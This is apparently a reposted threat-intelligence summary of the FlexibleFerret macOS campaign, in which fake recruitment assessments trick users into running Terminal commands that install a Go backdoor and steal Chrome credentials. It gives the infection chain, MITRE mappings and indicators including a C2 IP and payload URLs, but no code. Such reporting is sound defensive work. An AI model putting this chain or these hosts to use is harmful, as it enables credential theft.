Threat Research

FlexibleFerret: macOS Malware Used in Fake Job Scams

Securonix
FlexibleFerret: macOS Malware Used in Fake Job Scams

Jamf Threat Labs analyzed a multi-stage FlexibleFerret campaign that uses fake recruitment websites and staged hiring assessments to socially engineer macOS users into running Terminal commands that download and execute a shell loader and Go backdoor. The attack establishes persistence via a LaunchAgent, displays a decoy MediaPatcher.app to capture Chrome credentials and keychain data, and exfiltrates harvested data using the Dropbox upload API as part of the Contagious Interview operation. #FlexibleFerret #ContagiousInterview

Keypoints

  • Attackers create fake recruitment websites (e.g., evaluza[.]com, proficiencycert[.]com) that present staged hiring assessments to convince victims to run Terminal commands.
  • JavaScript stagers construct and prompt execution of a curl command that downloads a secondary shell script to /var/tmp/macpatch.sh and launches it, matching FlexibleFerret loader indicators.
  • The second-stage macpatch.sh determines host architecture, downloads an architecture-specific archive (CDrivers.zip), extracts it, and executes a bundled loader (drivfixer.sh) via a bundled Go runtime.
  • Persistence is achieved by writing a LaunchAgent at ~/Library/LaunchAgents/com.driver9990as7tpatch.plist pointing to the extracted loader, and an ad-hoc signed decoy app (MediaPatcher.app) is used to harvest credentials.
  • Credential harvesting includes a fake Chrome password prompt and automated collection of Chrome Login Data and related keychain files; exfiltration uses Dropbox’s content.dropboxapi.com/2/files/upload and the attacker queries api.ipify.org for the victim IP.
  • The Go backdoor implements a persistent command loop with handlers for system information, file upload/download, command execution, automated stealing, Chrome profile collection, and C2 communication with hXXp://95.169.180.140:8080.

MITRE Techniques

  • [T1059.003 ] Command and Scripting Interpreter: Unix Shell – The campaign relies on victims executing attacker-supplied Terminal commands to start the infection (‘execute a provided macOS command in the Terminal’).
  • [T1105 ] Ingress Tool Transfer – Initial stages download secondary payloads and archives to the host (e.g., ‘downloads a secondary payload to /var/tmp/macpatch.sh’).
  • [T1547.001 ] Boot or Logon Autostart Execution: Launch Agent – The installer writes a LaunchAgent to persist the loader at login (‘writes a LaunchAgent to~/Library/LaunchAgents/com.driver9990as7tpatch.plist’).
  • [T1567.002 ] Exfiltration Over Web Service: Cloud Storage – Stolen credentials are uploaded using Dropbox’s API via an authenticated POST to content.dropboxapi.com/2/files/upload (‘authenticated POST request to content.dropboxapi.com/2/files/upload’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – The backdoor communicates with its C2 over HTTP to hXXp://95.169.180.140:8080 (‘contacts the hard‑coded C2 server at hXXp://95.169.180.140:8080’).
  • [T1555.002 ] Credentials from Web Browsers – The malware collects Chrome Login Data and related keychain files for exfiltration (‘collect Chrome Login Data DB and the related keychain file for exfiltration’).
  • [T1082 ] System Information Discovery – The backdoor gathers basic system information such as username, hostname, OS, and architecture (‘collect system information (username, hostname, OS, architecture)’).
  • [T1027 ] Obfuscated Files or Information – The threat blends strings to hide real endpoints, e.g., concatenating fragments to form the Dropbox host (‘concatenating short string fragments to form content.dropboxapi.com’).

Indicators of Compromise

  • [IP address ] C2 server – 95.169.180.140 (C2 listed with port 8080).
  • [Domain/Host ] lure and payload hosting domains – evaluza[.]com, proficiencycert[.]com (payload hosting and staged assessment sites), and app.zynoracreative.com for second-stage files.
  • [URL ] second-stage payload URLs – hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch, hXXps://app.zynoracreative.com/updrv8/drv-Arm64.patch (used to fetch macpatch.sh and architecture-specific payloads).
  • [File path / filename ] dropped scripts and artifacts – /var/tmp/macpatch.sh, /var/tmp/CDrivers.zip, /var/tmp/CDrivers, drivfixer.sh, MediaPatcher.app, and ~/Library/LaunchAgents/com.driver9990as7tpatch.plist.
  • [API endpoint ] exfiltration and reconnaissance endpoints – content.dropboxapi.com/2/files/upload (exfiltration), api.ipify.org (public IP retrieval).

Read more: https://www.jamf.com/blog/flexibleferret-malware-continues-to-adapt/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint